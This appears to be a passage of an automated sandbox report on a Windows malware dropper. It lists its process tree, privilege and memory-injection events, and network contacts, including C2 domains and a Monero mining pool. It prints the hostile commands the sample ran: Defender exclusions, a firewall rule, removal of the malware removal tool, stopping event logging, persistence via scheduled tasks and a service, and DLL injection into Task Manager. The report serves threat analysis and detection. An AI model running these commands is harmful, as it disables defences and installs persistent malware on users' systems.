N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Suspicious behavior: GetForegroundWindowSpam

Description Indicator Process Target
N/A N/A N/A N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeCreatePagefilePrivilege N/A N/A N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeCreatePagefilePrivilege N/A N/A N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeCreatePagefilePrivilege N/A N/A N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeCreatePagefilePrivilege N/A N/A N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeCreatePagefilePrivilege N/A N/A N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeCreatePagefilePrivilege N/A N/A N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeCreatePagefilePrivilege N/A N/A N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeCreatePagefilePrivilege N/A N/A N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeCreatePagefilePrivilege N/A N/A N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeCreatePagefilePrivilege N/A N/A N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeCreatePagefilePrivilege N/A N/A N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeCreatePagefilePrivilege N/A N/A N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeCreatePagefilePrivilege N/A N/A N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeCreatePagefilePrivilege N/A N/A N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeCreatePagefilePrivilege N/A N/A N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeCreatePagefilePrivilege N/A N/A N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeCreatePagefilePrivilege N/A N/A N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeCreatePagefilePrivilege N/A N/A N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeCreatePagefilePrivilege N/A N/A N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeCreatePagefilePrivilege N/A N/A N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\288c47bbc1871b439df19ff4df68f076.exe N/A
Token: SeImpersonatePrivilege N/A C:\Users\Admin\AppData\Local\Temp\288c47bbc1871b439df19ff4df68f076.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeCreatePagefilePrivilege N/A N/A N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeCreatePagefilePrivilege N/A N/A N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeCreatePagefilePrivilege N/A N/A N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeCreatePagefilePrivilege N/A N/A N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeCreatePagefilePrivilege N/A N/A N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeCreatePagefilePrivilege N/A N/A N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\Conhost.exe N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeCreatePagefilePrivilege N/A N/A N/A
Token: SeDebugPrivilege N/A C:\Windows\system32\wusa.exe N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeCreatePagefilePrivilege N/A N/A N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\is-OUPSP.tmp\24EE.tmp N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\is-UJE7E.tmp\3F7C.tmp N/A

Suspicious use of SetWindowsHookEx

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\BroomSetup.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 3284 wrote to memory of 4312 N/A N/A C:\Users\Admin\AppData\Local\Temp\C12D.exe
PID 3284 wrote to memory of 4312 N/A N/A C:\Users\Admin\AppData\Local\Temp\C12D.exe
PID 3284 wrote to memory of 4312 N/A N/A C:\Users\Admin\AppData\Local\Temp\C12D.exe
PID 4312 wrote to memory of 1256 N/A C:\Users\Admin\AppData\Local\Temp\C12D.exe C:\Users\Admin\AppData\Local\Temp\C12D.exe
PID 4312 wrote to memory of 1256 N/A C:\Users\Admin\AppData\Local\Temp\C12D.exe C:\Users\Admin\AppData\Local\Temp\C12D.exe
PID 4312 wrote to memory of 1256 N/A C:\Users\Admin\AppData\Local\Temp\C12D.exe C:\Users\Admin\AppData\Local\Temp\C12D.exe
PID 4312 wrote to memory of 1256 N/A C:\Users\Admin\AppData\Local\Temp\C12D.exe C:\Users\Admin\AppData\Local\Temp\C12D.exe
PID 4312 wrote to memory of 1256 N/A C:\Users\Admin\AppData\Local\Temp\C12D.exe C:\Users\Admin\AppData\Local\Temp\C12D.exe
PID 4312 wrote to memory of 1256 N/A C:\Users\Admin\AppData\Local\Temp\C12D.exe C:\Users\Admin\AppData\Local\Temp\C12D.exe
PID 4312 wrote to memory of 1256 N/A C:\Users\Admin\AppData\Local\Temp\C12D.exe C:\Users\Admin\AppData\Local\Temp\C12D.exe
PID 4312 wrote to memory of 1256 N/A C:\Users\Admin\AppData\Local\Temp\C12D.exe C:\Users\Admin\AppData\Local\Temp\C12D.exe
PID 3284 wrote to memory of 4304 N/A N/A C:\Windows\system32\regsvr32.exe
PID 3284 wrote to memory of 4304 N/A N/A C:\Windows\system32\regsvr32.exe
PID 4304 wrote to memory of 3440 N/A C:\Windows\system32\regsvr32.exe C:\Windows\SysWOW64\regsvr32.exe
PID 4304 wrote to memory of 3440 N/A C:\Windows\system32\regsvr32.exe C:\Windows\SysWOW64\regsvr32.exe
PID 4304 wrote to memory of 3440 N/A C:\Windows\system32\regsvr32.exe C:\Windows\SysWOW64\regsvr32.exe
PID 3284 wrote to memory of 4052 N/A N/A C:\Users\Admin\AppData\Local\Temp\E021.exe
PID 3284 wrote to memory of 4052 N/A N/A C:\Users\Admin\AppData\Local\Temp\E021.exe
PID 3284 wrote to memory of 4052 N/A N/A C:\Users\Admin\AppData\Local\Temp\E021.exe
PID 3284 wrote to memory of 4724 N/A N/A C:\Users\Admin\AppData\Local\Temp\E5A0.exe
PID 3284 wrote to memory of 4724 N/A N/A C:\Users\Admin\AppData\Local\Temp\E5A0.exe
PID 3284 wrote to memory of 4724 N/A N/A C:\Users\Admin\AppData\Local\Temp\E5A0.exe
PID 3284 wrote to memory of 4300 N/A N/A C:\Users\Admin\AppData\Local\Temp\1A5.exe
PID 3284 wrote to memory of 4300 N/A N/A C:\Users\Admin\AppData\Local\Temp\1A5.exe
PID 3284 wrote to memory of 4300 N/A N/A C:\Users\Admin\AppData\Local\Temp\1A5.exe
PID 4300 wrote to memory of 3720 N/A C:\Users\Admin\AppData\Local\Temp\1A5.exe C:\Users\Admin\AppData\Local\Temp\288c47bbc1871b439df19ff4df68f076.exe
PID 4300 wrote to memory of 3720 N/A C:\Users\Admin\AppData\Local\Temp\1A5.exe C:\Users\Admin\AppData\Local\Temp\288c47bbc1871b439df19ff4df68f076.exe
PID 4300 wrote to memory of 3720 N/A C:\Users\Admin\AppData\Local\Temp\1A5.exe C:\Users\Admin\AppData\Local\Temp\288c47bbc1871b439df19ff4df68f076.exe
PID 4300 wrote to memory of 2188 N/A C:\Users\Admin\AppData\Local\Temp\1A5.exe C:\Users\Admin\AppData\Local\Temp\InstallSetup4.exe
PID 4300 wrote to memory of 2188 N/A C:\Users\Admin\AppData\Local\Temp\1A5.exe C:\Users\Admin\AppData\Local\Temp\InstallSetup4.exe
PID 4300 wrote to memory of 2188 N/A C:\Users\Admin\AppData\Local\Temp\1A5.exe C:\Users\Admin\AppData\Local\Temp\InstallSetup4.exe
PID 4300 wrote to memory of 2868 N/A C:\Users\Admin\AppData\Local\Temp\1A5.exe C:\Users\Admin\AppData\Local\Temp\FourthX.exe
PID 4300 wrote to memory of 2868 N/A C:\Users\Admin\AppData\Local\Temp\1A5.exe C:\Users\Admin\AppData\Local\Temp\FourthX.exe
PID 2188 wrote to memory of 2056 N/A C:\Users\Admin\AppData\Local\Temp\InstallSetup4.exe C:\Users\Admin\AppData\Local\Temp\BroomSetup.exe
PID 2188 wrote to memory of 2056 N/A C:\Users\Admin\AppData\Local\Temp\InstallSetup4.exe C:\Users\Admin\AppData\Local\Temp\BroomSetup.exe
PID 2188 wrote to memory of 2056 N/A C:\Users\Admin\AppData\Local\Temp\InstallSetup4.exe C:\Users\Admin\AppData\Local\Temp\BroomSetup.exe
PID 2056 wrote to memory of 2540 N/A C:\Users\Admin\AppData\Local\Temp\BroomSetup.exe C:\Windows\SysWOW64\cmd.exe
PID 2056 wrote to memory of 2540 N/A C:\Users\Admin\AppData\Local\Temp\BroomSetup.exe C:\Windows\SysWOW64\cmd.exe
PID 2056 wrote to memory of 2540 N/A C:\Users\Admin\AppData\Local\Temp\BroomSetup.exe C:\Windows\SysWOW64\cmd.exe
PID 3284 wrote to memory of 1952 N/A N/A C:\Users\Admin\AppData\Local\Temp\134A.exe
PID 3284 wrote to memory of 1952 N/A N/A C:\Users\Admin\AppData\Local\Temp\134A.exe
PID 3284 wrote to memory of 1952 N/A N/A C:\Users\Admin\AppData\Local\Temp\134A.exe
PID 2188 wrote to memory of 4344 N/A C:\Users\Admin\AppData\Local\Temp\InstallSetup4.exe C:\Users\Admin\AppData\Local\Temp\nsf11EF.tmp
PID 2188 wrote to memory of 4344 N/A C:\Users\Admin\AppData\Local\Temp\InstallSetup4.exe C:\Users\Admin\AppData\Local\Temp\nsf11EF.tmp
PID 2188 wrote to memory of 4344 N/A C:\Users\Admin\AppData\Local\Temp\InstallSetup4.exe C:\Users\Admin\AppData\Local\Temp\nsf11EF.tmp
PID 2540 wrote to memory of 2212 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\chcp.com
PID 2540 wrote to memory of 2212 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\chcp.com
PID 2540 wrote to memory of 2212 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\chcp.com
PID 3284 wrote to memory of 60 N/A N/A C:\Users\Admin\AppData\Local\Temp\24EE.exe
PID 3284 wrote to memory of 60 N/A N/A C:\Users\Admin\AppData\Local\Temp\24EE.exe
PID 3284 wrote to memory of 60 N/A N/A C:\Users\Admin\AppData\Local\Temp\24EE.exe
PID 60 wrote to memory of 2792 N/A C:\Users\Admin\AppData\Local\Temp\24EE.exe C:\Users\Admin\AppData\Local\Temp\is-OUPSP.tmp\24EE.tmp
PID 60 wrote to memory of 2792 N/A C:\Users\Admin\AppData\Local\Temp\24EE.exe C:\Users\Admin\AppData\Local\Temp\is-OUPSP.tmp\24EE.tmp
PID 60 wrote to memory of 2792 N/A C:\Users\Admin\AppData\Local\Temp\24EE.exe C:\Users\Admin\AppData\Local\Temp\is-OUPSP.tmp\24EE.tmp
PID 2540 wrote to memory of 4468 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\System32\Conhost.exe
PID 2540 wrote to memory of 4468 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\System32\Conhost.exe
PID 2540 wrote to memory of 4468 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\System32\Conhost.exe
PID 3720 wrote to memory of 428 N/A C:\Users\Admin\AppData\Local\Temp\288c47bbc1871b439df19ff4df68f076.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 3720 wrote to memory of 428 N/A C:\Users\Admin\AppData\Local\Temp\288c47bbc1871b439df19ff4df68f076.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 3720 wrote to memory of 428 N/A C:\Users\Admin\AppData\Local\Temp\288c47bbc1871b439df19ff4df68f076.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 3284 wrote to memory of 4700 N/A N/A C:\Users\Admin\AppData\Local\Temp\3F7C.exe
PID 3284 wrote to memory of 4700 N/A N/A C:\Users\Admin\AppData\Local\Temp\3F7C.exe
PID 3284 wrote to memory of 4700 N/A N/A C:\Users\Admin\AppData\Local\Temp\3F7C.exe
PID 4700 wrote to memory of 4084 N/A C:\Users\Admin\AppData\Local\Temp\3F7C.exe C:\Users\Admin\AppData\Local\Temp\is-UJE7E.tmp\3F7C.tmp

Uses Task Scheduler COM API

persistence

Processes

C:\Users\Admin\AppData\Local\Temp\5ff0249330e662805cd00089c294494833c800637af670ee25e7abd5079ca66d.exe

"C:\Users\Admin\AppData\Local\Temp\5ff0249330e662805cd00089c294494833c800637af670ee25e7abd5079ca66d.exe"

C:\Users\Admin\AppData\Local\Temp\C12D.exe

C:\Users\Admin\AppData\Local\Temp\C12D.exe

C:\Users\Admin\AppData\Local\Temp\C12D.exe

C:\Users\Admin\AppData\Local\Temp\C12D.exe

C:\Windows\system32\regsvr32.exe

regsvr32 /s C:\Users\Admin\AppData\Local\Temp\C583.dll

C:\Windows\SysWOW64\regsvr32.exe

/s C:\Users\Admin\AppData\Local\Temp\C583.dll

C:\Users\Admin\AppData\Local\Temp\E021.exe

C:\Users\Admin\AppData\Local\Temp\E021.exe

C:\Users\Admin\AppData\Local\Temp\E5A0.exe

C:\Users\Admin\AppData\Local\Temp\E5A0.exe

C:\Users\Admin\AppData\Local\Temp\1A5.exe

C:\Users\Admin\AppData\Local\Temp\1A5.exe

C:\Users\Admin\AppData\Local\Temp\288c47bbc1871b439df19ff4df68f076.exe

"C:\Users\Admin\AppData\Local\Temp\288c47bbc1871b439df19ff4df68f076.exe"

C:\Users\Admin\AppData\Local\Temp\InstallSetup4.exe

"C:\Users\Admin\AppData\Local\Temp\InstallSetup4.exe"

C:\Users\Admin\AppData\Local\Temp\FourthX.exe

"C:\Users\Admin\AppData\Local\Temp\FourthX.exe"

C:\Users\Admin\AppData\Local\Temp\BroomSetup.exe

C:\Users\Admin\AppData\Local\Temp\BroomSetup.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Roaming\Temp\Task.bat" "

C:\Users\Admin\AppData\Local\Temp\134A.exe

C:\Users\Admin\AppData\Local\Temp\134A.exe

C:\Users\Admin\AppData\Local\Temp\nsf11EF.tmp

C:\Users\Admin\AppData\Local\Temp\nsf11EF.tmp

C:\Windows\SysWOW64\chcp.com

chcp 1251

C:\Users\Admin\AppData\Local\Temp\24EE.exe

C:\Users\Admin\AppData\Local\Temp\24EE.exe

C:\Users\Admin\AppData\Local\Temp\is-OUPSP.tmp\24EE.tmp

"C:\Users\Admin\AppData\Local\Temp\is-OUPSP.tmp\24EE.tmp" /SL5="$3024C,4470470,54272,C:\Users\Admin\AppData\Local\Temp\24EE.exe"

C:\Windows\SysWOW64\schtasks.exe

schtasks /create /tn "MalayamaraUpdate" /tr "'C:\Users\Admin\AppData\Local\Temp\Updater.exe'" /sc minute /mo 30 /F

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -nologo -noprofile

C:\Users\Admin\AppData\Local\Temp\3F7C.exe

C:\Users\Admin\AppData\Local\Temp\3F7C.exe

C:\Users\Admin\AppData\Local\Temp\is-UJE7E.tmp\3F7C.tmp

"C:\Users\Admin\AppData\Local\Temp\is-UJE7E.tmp\3F7C.tmp" /SL5="$B0060,4314505,54272,C:\Users\Admin\AppData\Local\Temp\3F7C.exe"

C:\Users\Admin\AppData\Local\Temp\449E.exe

C:\Users\Admin\AppData\Local\Temp\449E.exe

C:\Users\Admin\AppData\Local\Temp\288c47bbc1871b439df19ff4df68f076.exe

"C:\Users\Admin\AppData\Local\Temp\288c47bbc1871b439df19ff4df68f076.exe"

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -nologo -noprofile

C:\Windows\system32\netsh.exe

netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes

C:\Windows\System32\cmd.exe

C:\Windows\Sysnative\cmd.exe /C "netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -nologo -noprofile

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -nologo -noprofile

C:\Windows\rss\csrss.exe

C:\Windows\rss\csrss.exe

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -nologo -noprofile

C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe

C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart

C:\Windows\system32\sc.exe

C:\Windows\system32\sc.exe delete "UTIXDCVF"

C:\Windows\system32\wusa.exe

wusa /uninstall /kb:890830 /quiet /norestart

C:\Windows\system32\sc.exe

C:\Windows\system32\sc.exe create "UTIXDCVF" binpath= "C:\ProgramData\xcfonrchdkar\vueqjgslwynd.exe" start= "auto"

C:\Windows\system32\sc.exe

C:\Windows\system32\sc.exe start "UTIXDCVF"

C:\Windows\system32\sc.exe

C:\Windows\system32\sc.exe stop eventlog

C:\ProgramData\xcfonrchdkar\vueqjgslwynd.exe

C:\ProgramData\xcfonrchdkar\vueqjgslwynd.exe

C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe

C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force

C:\Windows\SYSTEM32\schtasks.exe

schtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F

C:\Windows\SYSTEM32\schtasks.exe

schtasks /delete /tn ScheduledUpdate /f

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -nologo -noprofile

C:\Windows\system32\conhost.exe

C:\Windows\system32\conhost.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\explorer.exe

explorer.exe

C:\Windows\system32\wusa.exe

wusa /uninstall /kb:890830 /quiet /norestart

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -nologo -noprofile

C:\Users\Admin\AppData\Roaming\wfcvvwd

C:\Users\Admin\AppData\Roaming\wfcvvwd

C:\Users\Admin\AppData\Roaming\hucvvwd

C:\Users\Admin\AppData\Roaming\hucvvwd

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 6084 -s 488

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 1256 -s 19004

C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe

C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe taskmgr.exe C:\Users\Admin\AppData\Local\Temp\csrss\injector\NtQuerySystemInformationHook.dll

C:\Windows\SYSTEM32\schtasks.exe

schtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F

C:\Windows\windefender.exe

"C:\Windows\windefender.exe"

C:\Windows\SysWOW64\sc.exe

sc sdset WinDefender D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPLOCRSDRCWDWO;;;BA)(D;;WPDT;;;BA)(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)

C:\Windows\SysWOW64\cmd.exe

cmd.exe /C sc sdset WinDefender D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPLOCRSDRCWDWO;;;BA)(D;;WPDT;;;BA)(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)

C:\Windows\windefender.exe

C:\Windows\windefender.exe

Network

Country Destination Domain Proto
US 8.8.8.8:53 selebration17io.io udp
RU 91.215.85.120:80 selebration17io.io tcp
US 8.8.8.8:53 120.85.215.91.in-addr.arpa udp
UA 134.249.185.176:9001 tcp
N/A 127.0.0.1:49797 tcp
US 85.209.158.115:443 tcp
GB 31.127.34.9:9001 tcp
DE 185.172.128.19:80 185.172.128.19 tcp
US 8.8.8.8:53 19.128.172.185.in-addr.arpa udp
US 8.8.8.8:53 resergvearyinitiani.shop udp
US 172.67.217.100:443 resergvearyinitiani.shop tcp
US 8.8.8.8:53 technologyenterdo.shop udp
US 104.21.80.118:443 technologyenterdo.shop tcp
US 8.8.8.8:53 lighterepisodeheighte.fun udp
US 8.8.8.8:53 problemregardybuiwo.fun udp
US 8.8.8.8:53 100.217.67.172.in-addr.arpa udp
US 8.8.8.8:53 118.80.21.104.in-addr.arpa udp
US 8.8.8.8:53 detectordiscusser.shop udp
US 104.21.60.92:443 detectordiscusser.shop tcp
US 8.8.8.8:53 trmpc.com udp
US 8.8.8.8:53 edurestunningcrackyow.fun udp
US 8.8.8.8:53 92.60.21.104.in-addr.arpa udp
US 8.8.8.8:53 pooreveningfuseor.pw udp
US 8.8.8.8:53 turkeyunlikelyofw.shop udp
KR 210.182.29.70:80 trmpc.com tcp
US 172.67.202.191:443 turkeyunlikelyofw.shop tcp
US 8.8.8.8:53 191.202.67.172.in-addr.arpa udp
US 8.8.8.8:53 70.29.182.210.in-addr.arpa udp
US 8.8.8.8:53 associationokeo.shop udp
US 104.21.10.242:443 associationokeo.shop tcp
DE 185.172.128.90:80 185.172.128.90 tcp
US 8.8.8.8:53 242.10.21.104.in-addr.arpa udp
US 8.8.8.8:53 90.128.172.185.in-addr.arpa udp
DE 185.172.128.127:80 185.172.128.127 tcp
US 8.8.8.8:53 127.128.172.185.in-addr.arpa udp
US 8.8.8.8:53 en.bestsup.su udp
US 104.21.29.103:80 en.bestsup.su tcp
US 8.8.8.8:53 103.29.21.104.in-addr.arpa udp
DE 185.172.128.145:80 tcp
FR 163.172.29.34:443 tcp
US 8.8.8.8:53 145.128.172.185.in-addr.arpa udp
CH 46.19.141.85:8100 tcp
NL 45.66.33.45:443 tcp
DE 188.68.53.92:443 tcp
AT 5.42.64.33:80 5.42.64.33 tcp
US 8.8.8.8:53 33.64.42.5.in-addr.arpa udp
US 75.176.45.87:9001 tcp
AT 86.59.21.38:443 tcp
US 8.8.8.8:53 38.21.59.86.in-addr.arpa udp
FI 65.21.85.98:9001 tcp
IT 129.152.8.9:443 tcp
US 8.8.8.8:53 9.8.152.129.in-addr.arpa udp
US 8.8.8.8:53 98.85.21.65.in-addr.arpa udp
IT 129.152.8.9:443 tcp
FI 65.21.85.98:9001 tcp
US 8.8.8.8:53 sjyey.com udp
KR 211.181.24.132:80 sjyey.com tcp
US 8.8.8.8:53 132.24.181.211.in-addr.arpa udp
KR 211.181.24.132:80 sjyey.com tcp
US 8.8.8.8:53 e77bbb5a-182c-4ff3-ad31-530a3ea1a1d0.uuid.statsexplorer.org udp
KR 211.181.24.132:80 sjyey.com tcp
US 8.8.8.8:53 xmr-eu2.nanopool.org udp
NL 51.15.61.114:14433 xmr-eu2.nanopool.org tcp
US 8.8.8.8:53 114.61.15.51.in-addr.arpa udp
KR 211.181.24.132:80 sjyey.com tcp
US 8.8.8.8:53 pastebin.com udp
US 104.20.67.143:443 pastebin.com tcp
US 8.8.8.8:53 143.67.20.104.in-addr.arpa udp
KR 211.181.24.132:80 sjyey.com tcp
KR 211.181.24.132:80 sjyey.com tcp
KR 211.181.24.132:80 sjyey.com tcp
US 8.8.8.8:53 hejmbol.cem udp
KR 211.181.24.132:80 sjyey.com tcp
US 8.8.8.8:53 hejmbol.cem udp
US 8.8.8.8:53 eujleek.cem udp
US 8.8.8.8:53 skelers.erg udp
US 8.8.8.8:53 eujleek.cem udp
US 8.8.8.8:53 skelers.erg udp
US 8.8.8.8:53 hejmbol.cem udp
US 8.8.8.8:53 eujleek.cem udp
US 8.8.8.8:53 hejmbol.cem udp
US 8.8.8.8:53 esmbklj.edu.bb udp
US 8.8.8.8:53 skelers.erg udp
US 8.8.8.8:53 hejmbol.cem udp
US 8.8.8.8:53 esmbklj.edu.bb udp
US 8.8.8.8:53 hejmbol.cem udp
US 8.8.8.8:53 eujleek.cem udp
US 8.8.8.8:53 hejmbol.cem udp
US 8.8.8.8:53 eujleek.cem udp
US 8.8.8.8:53 skelers.erg udp
US 8.8.8.8:53 esmbklj.edu.bb udp
US 8.8.8.8:53 eujleek.cem udp
US 8.8.8.8:53 hejmbol.cem udp
US 8.8.8.8:53 hejmbol.cem udp
US 8.8.8.8:53 yee.erg.jr udp
US 8.8.8.8:53 skelers.erg udp
US 8.8.8.8:53 yee.erg.jr udp
US 8.8.8.8:53 hejmbol.cem udp
US 8.8.8.8:53 hejmbol.cem udp
US 8.8.8.8:53 geeglejrbvel.cem.pk udp
US 8.8.8.8:53 geeglejrbvel.cem.pk udp
US 8.8.8.8:53 skelers.erg udp
US 8.8.8.8:53 yee.erg.jr udp
US 8.8.8.8:53 hejmbol.cem udp
US 8.8.8.8:53 yee.erg.jr udp
US 8.8.8.8:53 eujleek.cem udp
US 8.8.8.8:53 geeglejrbvel.cem.pk udp
US 8.8.8.8:53 geeglejrbvel.cem.pk udp
US 8.8.8.8:53 hejmbol.cem udp
US 8.8.8.8:53 yee.erg.jr udp
US 8.8.8.8:53 ybhee.cem udp
US 8.8.8.8:53 ybhee.cem udp
US 8.8.8.8:53 sedmb-eszevzb.edu.bb udp
US 8.8.8.8:53 sedmb-eszevzb.edu.bb udp
US 8.8.8.8:53 hejmbol.cem udp
US 8.8.8.8:53 ybhee.cem udp
US 8.8.8.8:53 ybhee.cem udp
US 8.8.8.8:53 bblkbz-scheel.cem udp
US 8.8.8.8:53 bblkbz-scheel.cem udp
US 8.8.8.8:53 embolbex.fuz udp
US 8.8.8.8:53 embolbex.fuz udp
US 8.8.8.8:53 jelefezocb.cem udp
US 8.8.8.8:53 esmbklj.edu.bb udp
US 8.8.8.8:53 hejmbol.cem udp
US 8.8.8.8:53 skelers.erg udp
US 8.8.8.8:53 jelefezocb.cem udp
US 8.8.8.8:53 hejmbol.cem udp
US 8.8.8.8:53 cps.sp.gev.br udp
US 8.8.8.8:53 eujleek.cem udp
US 8.8.8.8:53 cps.sp.gev.br udp
US 8.8.8.8:53 eujleek.cem udp
US 8.8.8.8:53 sozhgbd.edu udp
US 8.8.8.8:53 sozhgbd.edu udp
US 8.8.8.8:53 ybhee.cem udp
US 8.8.8.8:53 ybhee.cem udp
US 8.8.8.8:53 esmbklj.edu.bb udp
US 8.8.8.8:53 www.sozhgbd.edu udp
US 8.8.8.8:53 hejmbol.cem udp
US 8.8.8.8:53 skelers.erg udp
US 8.8.8.8:53 www.sozhgbd.edu udp
US 8.8.8.8:53 skelers.erg udp
US 8.8.8.8:53 jbblom.mb udp
US 8.8.8.8:53 jbblom.mb udp
US 8.8.8.8:53 eujleek.cem udp
US 8.8.8.8:53 ybhee.fr udp
US 8.8.8.8:53 ybhee.cem udp
US 8.8.8.8:53 hejmbol.cem udp
US 8.8.8.8:53 ybhee.cem udp
US 8.8.8.8:53 esmbklj.edu.bb udp
US 8.8.8.8:53 hejmbol.cem udp
US 8.8.8.8:53 yee.erg.jr udp
US 8.8.8.8:53 yee.erg.jr udp
US 8.8.8.8:53 eujleek.cem udp
US 8.8.8.8:53 hejmbol.cem udp
US 8.8.8.8:53 ybhee.cem udp
US 8.8.8.8:53 skelers.erg udp
US 8.8.8.8:53 ybhee.cem udp
US 8.8.8.8:53 loder.soedlce.pl udp
US 8.8.8.8:53 loder.soedlce.pl udp
US 8.8.8.8:53 gmbol.ceem udp
US 8.8.8.8:53 gmbol.ceem udp
US 8.8.8.8:53 hejmbol.cem udp
US 8.8.8.8:53 esmbklj.edu.bb udp
US 8.8.8.8:53 ybhee.cem udp
US 8.8.8.8:53 hejmbol.cem udp
US 8.8.8.8:53 skelers.erg udp
US 8.8.8.8:53 ybhee.cem udp
US 8.8.8.8:53 ocleud.cem udp
US 8.8.8.8:53 eujleek.cem udp
US 8.8.8.8:53 ocleud.cem udp
US 8.8.8.8:53 ybhee.fr udp
US 8.8.8.8:53 ybhee.fr udp
US 8.8.8.8:53 gmbol.ce udp
US 8.8.8.8:53 gmbol.ce udp
US 8.8.8.8:53 hejmbol.cem udp
US 8.8.8.8:53 gmbol.cempr udp
US 8.8.8.8:53 yee.erg.jr udp
US 8.8.8.8:53 gmbol.cempr udp
US 8.8.8.8:53 hejmbol.cem udp
US 8.8.8.8:53 skelers.erg udp
US 8.8.8.8:53 love.cem udp
US 8.8.8.8:53 love.cem udp
